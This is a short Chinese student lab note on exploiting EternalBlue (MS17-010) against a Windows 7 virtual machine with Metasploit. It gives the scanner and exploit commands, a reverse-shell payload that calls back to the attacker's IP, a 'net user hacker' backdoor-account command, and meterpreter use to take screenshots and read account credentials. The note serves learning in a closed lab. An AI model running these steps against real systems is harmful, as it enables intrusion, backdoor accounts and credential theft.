记第一次网安实验——MSF永恒之蓝(Eternalblue)漏洞利用
测试工具:
1 | 1.vmware station15 |
实验过程:
1.确定靶机IP,及本机IP地址
lhost:192.168.11.144
rhosts:192.168.11.146
2.启动MSF(msfconsole),并查找永恒之蓝的exp等相关信息: search ms17-010

3.测试目标主机是否存在该漏洞(use auxiliary/scanner/smb/smb_ms17_010 or use 1),检测程序,设置靶机IP,自动检测是否其存在永恒之蓝漏洞
可以看出,靶机似乎存在永恒之蓝漏洞
(- Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit))
4.正式攻击,配置exp,设置参数(靶机IP,本机IP,侦听端口等),设置payload(多种选择,看需求吧)
这里用的payload: set payload windows/x64/shell_reverse_tcp
1. set rhosts 192.168.11.146(靶机IP)
2. set lhost 192.168.11.144(本机IP),靶机反向连接本机时需要用到。
3. set payload windows/x64/shell_reverse_tcp
4. exploit || run
5.拿到shell,试着添加用户组:net user hacker 123 /add
在cmd进行其他操作……
另一个payload(set payload windows/x64/meterpreter/reverse_tcp)的结果:
可以获取靶机的screenshot及用户组账户,密码:
此图非彼图,这是攻击机漏洞利用后远程使用screenshot命令截的图。
还得学一下meterpreter这个模块的用法。